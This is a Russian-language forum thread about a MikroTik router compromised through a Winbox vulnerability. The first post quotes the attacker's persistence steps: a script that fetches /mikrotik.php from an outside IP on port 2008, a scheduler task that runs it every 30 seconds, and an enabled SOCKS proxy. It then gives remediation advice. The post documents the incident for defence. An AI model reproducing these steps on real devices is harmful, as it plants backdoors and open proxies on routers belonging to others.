Jump to content

Проверяем свои борды. опять ВЗЛОМ Mikrotik


Recommended Posts

Без лишних подробностей. ссыль

Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два!
Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным.
Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля.
 

Далее после входа злоумышленник на микротике:

1. Создаёт скрипт script1_ 

/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http


2. Создаёт в планировщике задание каждые 30 секунд выполнять скрипт script1_
3. Включает IP-> Socks

/ip socks> print enabled: yes port: 4145 connection-idle-timeout: 2m max-connections: 200


Самое интересное то, что файл mikrotik.php пустой, либо это значит что это только предупреждение об уязвимости, либо всётаки конфиг ушёл в английское королевство.

Пока непонятно как такое могло быть?!

Что делать ели Ваш микротик взломан таким образом?

Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи.

Удалить скрипт и задание планировщика.

Выключить носки) Ip->Socks

Менять пароли

Шиться новой прошивкой, но не факт что она уже есть с фиксом)

  • Thanks 2
Link to post
Share on other sites

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Link to post
Share on other sites
Только что, Kto To сказал:

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Спору нет, методики взлома давно уже известны, но не все обновляются до фиксовых версий...

Link to post
Share on other sites
16 минут назад, Kto To сказал:

Я не понимаю вообще зачем давать доступ на авторизацию винбокс/хттп в микротике извне? Подымаете на микротике vpn - конектитесь на него, с него уже ходите по сети своей.

Это на уровне админа, но их же домохозяйкам ставят. 

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

  • Similar Content

    • By Туйон
      Отличие от обычной SXT5 - гигабитный порт и лицензия 4 уровня (может быть не только бриджом а и точкой доступа).
      Старенькая, АС-стандарт не поддерживает.
      В своё время мегабит 160+ вроде качала.
      Где-то возможно в том же гараже есть вторая такая же, если надо - могу поискать.
      Внешнее состояние нормальное. Чуть пожелтела но трещин и т д нету.
      В комплекте сама точка и хвостик крепления (вставлятся в саму антенну).
      РОЕ где-то в работе до сих пор, но подойдут любые.
      Цена.. пусть для начала будет 1000 грн.
      Проверена в комнате "на коленке", дам время на полноценную поверку, а то мало ли (года два лежала отдыхала).
      Желающие пишите в ЛС.
       
      https://www.technotrade.com.ua/Products/MikroTik_SXT_G_5HnD.php
    • By independent
      Mikrotik rb4011igs+5hacq-2hnd-in
      Б/в.
      Ціна 5075 грн
       
      https://www.olx.ua/d/uk/obyavlenie/mikrotik-rb4011igs-5hacq2hnd-in-IDWH6Lo.html
    • By independent
      Mikrotik rb4011igs+5hacq-2hnd-in б/в.
      Продається в результаті великого енергоспоживання від дбж.
       
      Ціна 6100 грн
       
      https://www.olx.ua/d/uk/obyavlenie/mikrotik-rb4011igs-5hacq2hnd-in-IDWH6Lo.html
    • By Axel K
      Вітаю!
       
      налаштування capsman
      /caps-man channel add band=2ghz-b/g/n extension-channel=disabled frequency=2412,2437,2462 name=channel1 add band=5ghz-a/n/ac extension-channel=disabled frequency=5180 name=channel5 skip-dfs-channels=yes tx-power=40 /caps-man datapath add bridge=Main client-to-client-forwarding=yes local-forwarding=no name=datapath1 /caps-man configuration add channel=channel1 datapath=datapath1 max-sta-count=20 mode=ap name=cfg1 rx-chains=0,1,2,3 ssid=25 tx-chains=0,1,2,3 add channel=channel5 datapath=datapath1 hide-ssid=no mode=ap name=cfg5 rx-chains=0,1,2,3 ssid=25 tx-chains=0,1,2,3 /caps-man access-list add action=reject allow-signal-out-of-range=10s disabled=no signal-range=-120..-85 ssid-regexp="" /caps-man manager set enabled=yes /caps-man provisioning add action=create-dynamic-enabled hw-supported-modes=ac master-configuration=cfg5 name-format=prefix-identity add action=create-dynamic-enabled hw-supported-modes=gn master-configuration=cfg1 name-format=prefix-identity проблема у низькій швидкості у клієнта
      якщо включити local-forwarding=yes, клієнт підключається, але не отримує ір.
       
      розумію, що на bdcom не вистачає налаштувань, прошу допомоги.
    • By viktorrc17
      Підкажіть. Така ситуація.
      Роутер Mikrotik працює від ups.
      Провайдер Київстар.
      При відключенні ел енергії, інтернет працює поки не здохнуть акуми на якомусь з вузлів у провайдера.
      Після включення ел.енергіії, інтернет не працює, допомагає перезавантаження роутера, або оновлення ip адреси.
      Що можна з цим зробити?
×
×
  • Create New...